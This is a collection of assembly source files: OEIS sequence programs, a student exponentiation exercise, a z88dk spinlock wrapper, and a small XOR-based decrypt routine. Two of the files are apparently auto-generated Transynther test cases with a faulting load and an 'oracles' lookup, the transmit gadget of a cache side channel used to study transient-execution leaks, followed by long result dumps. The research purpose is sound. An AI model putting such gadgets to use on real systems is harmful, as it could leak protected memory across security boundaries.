TheStack | f781a5feb5cb5cd47e149fd9ca35d1f0a346fa24 | Assemblycode:Assembly | {"size": 451, "ext": "asm", "max_stars_repo_path": "programs/oeis/174/A174426.asm", "max_stars_repo_name": "neoneye/loda", "max_stars_repo_stars_event_min_datetime": "2018-02-06T19:19:31.000Z", "max_stars_repo_stars_event_max_datetime": "2022-01-17T21:53:31.000Z", "max_issues_repo_path": "programs/oeis/174/A174426.asm", "max_issues_repo_name": "neoneye/loda", "max_issues_repo_issues_event_min_datetime": "2021-02-22T19:00:34.000Z", "max_issues_repo_issues_event_max_datetime": "2021-08-28T10:47:47.000Z", "max_forks_repo_path": "programs/oeis/174/A174426.asm", "max_forks_repo_name": "neoneye/loda", "max_forks_repo_forks_event_min_datetime": "2021-02-24T21:14:16.000Z", "max_forks_repo_forks_event_max_datetime": "2021-08-09T19:48:05.000Z"} | {"max_stars_count": 22, "max_issues_count": 41, "max_forks_count": 5, "avg_line_length": 64.4285714286, "max_line_length": 207, "alphanum_fraction": 0.7627494457} | ; A174426: Denominator of fractions in A171676.
; 4,36,36,144,144,144,400,400,400,400,900,900,900,900,900,1764,1764,1764,1764,1764,1764,3136,3136,3136,3136,3136,3136,3136,5184,5184,5184,5184,5184,5184,5184,5184,8100,8100,8100,8100,8100,8100,8100,8100,8100
seq $0,127739 ; Triangle read by rows, in which row n contains the triangular number T(n) = A000217(n) repeated n times; smallest triangular number greater than or equal to n.
pow $0,2
mul $0,4
|
||||
TheStack | e762056f28993118b099158da521b76d2d48de73 | Assemblycode:Assembly | {"size": 889, "ext": "asm", "max_stars_repo_path": "LM/Aula5/Lista3/ex3_a.asm", "max_stars_repo_name": "Kw-Vinicius/Linguagem-de-Montagem-", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "LM/Aula5/Lista3/ex3_a.asm", "max_issues_repo_name": "Kw-Vinicius/Linguagem-de-Montagem-", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "LM/Aula5/Lista3/ex3_a.asm", "max_forks_repo_name": "Kw-Vinicius/Linguagem-de-Montagem-", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 16.462962963, "max_line_length": 93, "alphanum_fraction": 0.4690663667} | ;--------------------------------------------------------------------------------------------
;3. Escreva um programa em Assembly que: inicialize duas posições de memória com
;conteúdo bytes, rótulos “base” e “expo” e retorne o resultado de base expo
;a.) Utilizando apenas somas
;b.) Utilizando multiplicações
; Vinicius Atsushi Sato
; a) Somas
;--------------------------------------------------------------------------------------------
SECTION .data
base: db 5
exp : db 3
result: db 0
SECTION .text
global _start
_start:
mov al,[base]
mov cl,[base]
mov bl,[exp]
dec bl
multiplicacao:
add [result],cl
dec al
cmp al,0
jne multiplicacao
mov cl,[result]
dec bl
mov al,[base]
dec al
cmp bl,0
jne multiplicacao
fim:
mov bl,[result]
mov eax,1
int 80h
|
||||
TheStack | f5b070982c39181c95d39ebe73b2e2cb9741673a | Assemblycode:Assembly | {"size": 1258, "ext": "asm", "max_stars_repo_path": "programs/oeis/212/A212804.asm", "max_stars_repo_name": "neoneye/loda", "max_stars_repo_stars_event_min_datetime": "2018-02-06T19:19:31.000Z", "max_stars_repo_stars_event_max_datetime": "2022-01-17T21:53:31.000Z", "max_issues_repo_path": "programs/oeis/212/A212804.asm", "max_issues_repo_name": "neoneye/loda", "max_issues_repo_issues_event_min_datetime": "2021-02-22T19:00:34.000Z", "max_issues_repo_issues_event_max_datetime": "2021-08-28T10:47:47.000Z", "max_forks_repo_path": "programs/oeis/212/A212804.asm", "max_forks_repo_name": "neoneye/loda", "max_forks_repo_forks_event_min_datetime": "2021-02-24T21:14:16.000Z", "max_forks_repo_forks_event_max_datetime": "2021-08-09T19:48:05.000Z"} | {"max_stars_count": 22, "max_issues_count": 41, "max_forks_count": 5, "avg_line_length": 104.8333333333, "max_line_length": 1132, "alphanum_fraction": 0.8680445151} | ; A212804: Expansion of (1 - x)/(1 - x - x^2).
; 1,0,1,1,2,3,5,8,13,21,34,55,89,144,233,377,610,987,1597,2584,4181,6765,10946,17711,28657,46368,75025,121393,196418,317811,514229,832040,1346269,2178309,3524578,5702887,9227465,14930352,24157817,39088169,63245986,102334155,165580141,267914296,433494437,701408733,1134903170,1836311903,2971215073,4807526976,7778742049,12586269025,20365011074,32951280099,53316291173,86267571272,139583862445,225851433717,365435296162,591286729879,956722026041,1548008755920,2504730781961,4052739537881,6557470319842,10610209857723,17167680177565,27777890035288,44945570212853,72723460248141,117669030460994,190392490709135,308061521170129,498454011879264,806515533049393,1304969544928657,2111485077978050,3416454622906707,5527939700884757,8944394323791464,14472334024676221,23416728348467685,37889062373143906,61305790721611591,99194853094755497,160500643816367088,259695496911122585,420196140727489673,679891637638612258,1100087778366101931,1779979416004714189,2880067194370816120,4660046610375530309,7540113804746346429,12200160415121876738,19740274219868223167,31940434634990099905,51680708854858323072,83621143489848422977,135301852344706746049
mov $1,1
lpb $0
sub $0,1
mov $3,$1
mov $1,$2
add $2,$3
lpe
mov $0,$1
|
||||
TheStack | b41031ccac540ba2bf965831e98e02b63abc8f28 | Assemblycode:Assembly | {"size": 1107, "ext": "asm", "max_stars_repo_path": "programs/oeis/131/A131793.asm", "max_stars_repo_name": "jmorken/loda", "max_stars_repo_stars_event_min_datetime": "2021-03-15T11:38:20.000Z", "max_stars_repo_stars_event_max_datetime": "2021-03-15T11:38:20.000Z", "max_issues_repo_path": "programs/oeis/131/A131793.asm", "max_issues_repo_name": "jmorken/loda", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "programs/oeis/131/A131793.asm", "max_forks_repo_name": "jmorken/loda", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 1, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 48.1304347826, "max_line_length": 893, "alphanum_fraction": 0.6793134598} | ; A131793: 3 odds, 3 evens.
; 1,3,5,2,4,6,7,9,11,8,10,12,13,15,17,14,16,18,19,21,23,20,22,24,25,27,29,26,28,30,31,33,35,32,34,36,37,39,41,38,40,42,43,45,47,44,46,48,49,51,53,50,52,54,55,57,59,56,58,60,61,63,65,62,64,66,67,69,71,68,70,72,73,75,77,74,76,78,79,81,83,80,82,84,85,87,89,86,88,90,91,93,95,92,94,96,97,99,101,98,100,102,103,105,107,104,106,108,109,111,113,110,112,114,115,117,119,116,118,120,121,123,125,122,124,126,127,129,131,128,130,132,133,135,137,134,136,138,139,141,143,140,142,144,145,147,149,146,148,150,151,153,155,152,154,156,157,159,161,158,160,162,163,165,167,164,166,168,169,171,173,170,172,174,175,177,179,176,178,180,181,183,185,182,184,186,187,189,191,188,190,192,193,195,197,194,196,198,199,201,203,200,202,204,205,207,209,206,208,210,211,213,215,212,214,216,217,219,221,218,220,222,223,225,227,224,226,228,229,231,233,230,232,234,235,237,239,236,238,240,241,243,245,242,244,246,247,249,251,248
mov $2,$0
mod $2,6
mov $3,$0
mov $0,$2
mov $1,2
add $3,1
mov $4,$3
sub $4,3
add $1,$4
add $1,$2
lpb $0
mov $0,2
sub $1,3
add $0,$1
sub $1,2
sub $0,$1
sub $0,2
lpe
add $1,1
|
||||
TheStack | d49fcc7c39c0fb401481ad82d917395e3c74bd18 | Assemblycode:Assembly | {"size": 237, "ext": "asm", "max_stars_repo_path": "libsrc/_DEVELOPMENT/threads/mutex/c/sdcc_iy/spinlock_release.asm", "max_stars_repo_name": "jpoikela/z88dk", "max_stars_repo_stars_event_min_datetime": "2017-01-14T23:33:45.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-30T11:28:42.000Z", "max_issues_repo_path": "libsrc/_DEVELOPMENT/threads/mutex/c/sdcc_iy/spinlock_release.asm", "max_issues_repo_name": "jpoikela/z88dk", "max_issues_repo_issues_event_min_datetime": "2017-01-15T16:12:02.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-31T12:11:12.000Z", "max_forks_repo_path": "libsrc/_DEVELOPMENT/threads/mutex/c/sdcc_iy/spinlock_release.asm", "max_forks_repo_name": "jpoikela/z88dk", "max_forks_repo_forks_event_min_datetime": "2017-01-17T10:43:03.000Z", "max_forks_repo_forks_event_max_datetime": "2022-03-23T17:25:02.000Z"} | {"max_stars_count": 640, "max_issues_count": 1600, "max_forks_count": 215, "avg_line_length": 11.85, "max_line_length": 39, "alphanum_fraction": 0.7721518987} |
; void spinlock_release(char *spinlock)
SECTION code_clib
SECTION code_threads_mutex
PUBLIC _spinlock_release
EXTERN asm_spinlock_release
_spinlock_release:
pop af
pop hl
push hl
push af
jp asm_spinlock_release
|
||||
TheStack | ae7c3ce53178ae6f2f8e06424a77330ad5940960 | Assemblycode:Assembly | {"size": 384, "ext": "asm", "max_stars_repo_path": "oeis/006/A006565.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/006/A006565.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/006/A006565.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 34.9090909091, "max_line_length": 192, "alphanum_fraction": 0.765625} | ; A006565: Number of ways to color vertices of a hexagon using <= n colors, allowing only rotations.
; Submitted by Jamie Morken(s3.)
; 0,1,14,130,700,2635,7826,19684,43800,88725,166870,295526,498004,804895,1255450,1899080,2796976,4023849,5669790,7842250,10668140,14296051,18898594,24674860,31853000,40692925,51489126,64573614
sub $2,$0
pow $0,2
add $0,1
bin $0,3
bin $2,3
sub $0,$2
|
||||
TheStack | 7e16b9d492771921c8aea6e33d6758a16c2d6a6c | Assemblycode:Assembly | {"size": 630, "ext": "asm", "max_stars_repo_path": "Code/Assembly/decrypt_DNU.asm", "max_stars_repo_name": "dks1018/CoffeeShopCoding", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "Code/Assembly/decrypt_DNU.asm", "max_issues_repo_name": "dks1018/CoffeeShopCoding", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "Code/Assembly/decrypt_DNU.asm", "max_forks_repo_name": "dks1018/CoffeeShopCoding", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 14.3181818182, "max_line_length": 41, "alphanum_fraction": 0.746031746} | Encrypt Function
push ebp
mov ebp,esp
pop ebp
ret
Decrypt Function
push ebp
mov ebp,esp
add dword [arg_8h], 0x26
xor dword [arg_8h], 0x37
xor dword [arg_8h], 0x11e61
not dword [arg_8h]
xor dword [arg_8h], 0x7a69
sub dword [arg_8h], 0x18
mov eax, dword [arg_8h]
pop ebp
ret
push ebp
mov ebp,esp
mov eax, 4
add eax, 0x26
xor eax, 0x37
xor eax, 0x11e61
not eax
xor eax, 0x7a69
sub eax, 0x18
pop ebp
ret
e asm.arch=x86 # Set architecture to x86
e asm.bits=32 # Set bits to 32
waf encrypt.asm # Read assembly from file
aei # Initialize VM State
aeim # Initialize VM Stack
aeip # Initialize VM EIP to current seek
dr
aes
aes
aes
dr
|
||||
TheStack | 491e9e3728c7824d24ed21384b8790f8334b8c8b | Assemblycode:Assembly | {"size": 6021, "ext": "asm", "max_stars_repo_path": "Transynther/x86/_processed/NONE/_zr_/i7-8650U_0xd2.log_11302_1836.asm", "max_stars_repo_name": "ljhsiun2/medusa", "max_stars_repo_stars_event_min_datetime": "2020-08-13T19:41:58.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-30T12:22:51.000Z", "max_issues_repo_path": "Transynther/x86/_processed/NONE/_zr_/i7-8650U_0xd2.log_11302_1836.asm", "max_issues_repo_name": "ljhsiun2/medusa", "max_issues_repo_issues_event_min_datetime": "2021-04-29T06:29:35.000Z", "max_issues_repo_issues_event_max_datetime": "2021-05-13T21:02:30.000Z", "max_forks_repo_path": "Transynther/x86/_processed/NONE/_zr_/i7-8650U_0xd2.log_11302_1836.asm", "max_forks_repo_name": "ljhsiun2/medusa", "max_forks_repo_forks_event_min_datetime": "2020-07-14T17:07:07.000Z", "max_forks_repo_forks_event_max_datetime": "2022-03-21T01:12:22.000Z"} | {"max_stars_count": 9, "max_issues_count": 1, "max_forks_count": 3, "avg_line_length": 40.9591836735, "max_line_length": 2999, "alphanum_fraction": 0.6591928251} | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %r14
push %r15
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0x92c7, %rsi
lea addresses_UC_ht+0x86ef, %rdi
nop
nop
nop
and %rbp, %rbp
mov $71, %rcx
rep movsl
nop
xor $49706, %r11
lea addresses_D_ht+0x4d67, %r15
nop
nop
nop
cmp $60084, %r10
mov (%r15), %esi
nop
nop
cmp $2450, %r11
lea addresses_normal_ht+0x16667, %rsi
lea addresses_UC_ht+0x14567, %rdi
cmp %r10, %r10
mov $76, %rcx
rep movsb
dec %rdi
lea addresses_UC_ht+0x3667, %rsi
lea addresses_WT_ht+0x10067, %rdi
clflush (%rdi)
nop
nop
nop
nop
cmp %r14, %r14
mov $112, %rcx
rep movsb
nop
nop
nop
nop
nop
xor $34243, %rbp
lea addresses_D_ht+0x1b7f9, %rsi
lea addresses_WC_ht+0x2367, %rdi
cmp %r11, %r11
mov $79, %rcx
rep movsb
and %rbp, %rbp
pop %rsi
pop %rdi
pop %rcx
pop %rbp
pop %r15
pop %r14
pop %r11
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r12
push %r13
push %r8
push %rbp
push %rdi
// Store
lea addresses_US+0x137a7, %rbp
cmp %r11, %r11
mov $0x5152535455565758, %r12
movq %r12, %xmm1
movups %xmm1, (%rbp)
nop
nop
nop
nop
nop
sub $36274, %r11
// Store
lea addresses_UC+0x1f067, %r12
nop
add $62977, %rdi
movl $0x51525354, (%r12)
xor $33221, %rdi
// Store
lea addresses_UC+0x1c067, %r12
nop
nop
nop
nop
nop
sub $11654, %r13
mov $0x5152535455565758, %r8
movq %r8, (%r12)
nop
nop
nop
sub %r11, %r11
// Faulty Load
lea addresses_WC+0xb067, %rbp
xor %r11, %r11
movups (%rbp), %xmm4
vpextrq $1, %xmm4, %r8
lea oracles, %r12
and $0xff, %r8
shlq $12, %r8
mov (%r12,%r8,1), %r8
pop %rdi
pop %rbp
pop %r8
pop %r13
pop %r12
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_WC', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_US', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 6, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_UC', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 11, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_UC', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 11, 'same': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_WC', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}}
<gen_prepare_buffer>
{'OP': 'REPM', 'src': {'type': 'addresses_UC_ht', 'congruent': 2, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 3, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_D_ht', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 8, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_normal_ht', 'congruent': 5, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 7, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_UC_ht', 'congruent': 8, 'same': False}, 'dst': {'type': 'addresses_WT_ht', 'congruent': 11, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_D_ht', 'congruent': 0, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 7, 'same': False}}
{'00': 11302}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
|
||||
TheStack | ab5e8b30c52e55ad3e99aa2ea384a8f9aa390b27 | Assemblycode:Assembly | {"size": 7190, "ext": "asm", "max_stars_repo_path": "Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0.log_21829_628.asm", "max_stars_repo_name": "ljhsiun2/medusa", "max_stars_repo_stars_event_min_datetime": "2020-08-13T19:41:58.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-30T12:22:51.000Z", "max_issues_repo_path": "Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0.log_21829_628.asm", "max_issues_repo_name": "ljhsiun2/medusa", "max_issues_repo_issues_event_min_datetime": "2021-04-29T06:29:35.000Z", "max_issues_repo_issues_event_max_datetime": "2021-05-13T21:02:30.000Z", "max_forks_repo_path": "Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xa0.log_21829_628.asm", "max_forks_repo_name": "ljhsiun2/medusa", "max_forks_repo_forks_event_min_datetime": "2020-07-14T17:07:07.000Z", "max_forks_repo_forks_event_max_datetime": "2022-03-21T01:12:22.000Z"} | {"max_stars_count": 9, "max_issues_count": 1, "max_forks_count": 3, "avg_line_length": 37.0618556701, "max_line_length": 2999, "alphanum_fraction": 0.6613351878} | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r12
push %r13
push %r14
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0xb8, %r13
nop
and %rbp, %rbp
and $0xffffffffffffffc0, %r13
movntdqa (%r13), %xmm4
vpextrq $1, %xmm4, %r14
inc %r11
lea addresses_WT_ht+0x1aff8, %rsi
lea addresses_WC_ht+0x58, %rdi
nop
nop
nop
nop
nop
and $20504, %r11
mov $65, %rcx
rep movsq
nop
add $11108, %rbp
lea addresses_UC_ht+0x61e2, %rcx
clflush (%rcx)
nop
nop
cmp %r11, %r11
movb $0x61, (%rcx)
sub $50306, %r11
lea addresses_normal_ht+0x12278, %rsi
lea addresses_normal_ht+0x76b8, %rdi
nop
add $57854, %r12
mov $111, %rcx
rep movsw
nop
nop
nop
nop
nop
and %rcx, %rcx
lea addresses_UC_ht+0x155b8, %rbp
nop
nop
nop
cmp %rcx, %rcx
mov $0x6162636465666768, %r13
movq %r13, %xmm1
movups %xmm1, (%rbp)
nop
dec %rcx
lea addresses_normal_ht+0x19d38, %rsi
lea addresses_WT_ht+0x1c8b8, %rdi
nop
nop
nop
nop
xor %r13, %r13
mov $30, %rcx
rep movsq
nop
nop
nop
nop
sub %rdi, %rdi
lea addresses_A_ht+0x178b8, %rsi
lea addresses_normal_ht+0xac01, %rdi
nop
xor %r11, %r11
mov $89, %rcx
rep movsw
nop
nop
nop
nop
add %r14, %r14
lea addresses_normal_ht+0xd8b8, %rsi
lea addresses_WC_ht+0x28c8, %rdi
nop
dec %r12
mov $28, %rcx
rep movsl
nop
nop
sub $49352, %rdi
lea addresses_WC_ht+0x9420, %rsi
lea addresses_normal_ht+0xcae8, %rdi
nop
nop
nop
nop
nop
add $14010, %r13
mov $70, %rcx
rep movsq
xor %rsi, %rsi
lea addresses_normal_ht+0x2f58, %rcx
nop
add %rdi, %rdi
movups (%rcx), %xmm7
vpextrq $1, %xmm7, %r12
nop
nop
nop
nop
and $64289, %rcx
pop %rsi
pop %rdi
pop %rcx
pop %rbp
pop %r14
pop %r13
pop %r12
pop %r11
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r14
push %rax
push %rcx
push %rdi
push %rdx
push %rsi
// Store
lea addresses_WT+0x1b1e8, %r14
nop
nop
sub %rdi, %rdi
mov $0x5152535455565758, %rdx
movq %rdx, (%r14)
nop
nop
cmp $60395, %rdi
// Store
lea addresses_WC+0x58d2, %rcx
xor %rax, %rax
movb $0x51, (%rcx)
cmp %rcx, %rcx
// Faulty Load
lea addresses_UC+0x30b8, %r12
nop
nop
nop
xor %rdx, %rdx
movups (%r12), %xmm3
vpextrq $0, %xmm3, %r14
lea oracles, %r12
and $0xff, %r14
shlq $12, %r14
mov (%r12,%r14,1), %r14
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rax
pop %r14
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'src': {'NT': False, 'same': False, 'congruent': 0, 'type': 'addresses_UC', 'AVXalign': False, 'size': 1}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 4, 'type': 'addresses_WT', 'AVXalign': False, 'size': 8}}
{'OP': 'STOR', 'dst': {'NT': True, 'same': False, 'congruent': 1, 'type': 'addresses_WC', 'AVXalign': False, 'size': 1}}
[Faulty Load]
{'src': {'NT': False, 'same': True, 'congruent': 0, 'type': 'addresses_UC', 'AVXalign': False, 'size': 16}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'NT': True, 'same': False, 'congruent': 11, 'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 16}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 5, 'type': 'addresses_WT_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 5, 'type': 'addresses_WC_ht'}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': True, 'congruent': 1, 'type': 'addresses_UC_ht', 'AVXalign': False, 'size': 1}}
{'src': {'same': False, 'congruent': 6, 'type': 'addresses_normal_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 9, 'type': 'addresses_normal_ht'}}
{'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 0, 'type': 'addresses_UC_ht', 'AVXalign': False, 'size': 16}}
{'src': {'same': False, 'congruent': 5, 'type': 'addresses_normal_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 8, 'type': 'addresses_WT_ht'}}
{'src': {'same': False, 'congruent': 8, 'type': 'addresses_A_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 0, 'type': 'addresses_normal_ht'}}
{'src': {'same': False, 'congruent': 11, 'type': 'addresses_normal_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 4, 'type': 'addresses_WC_ht'}}
{'src': {'same': False, 'congruent': 2, 'type': 'addresses_WC_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 2, 'type': 'addresses_normal_ht'}}
{'src': {'NT': False, 'same': False, 'congruent': 5, 'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 16}, 'OP': 'LOAD'}
{'00': 21829}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 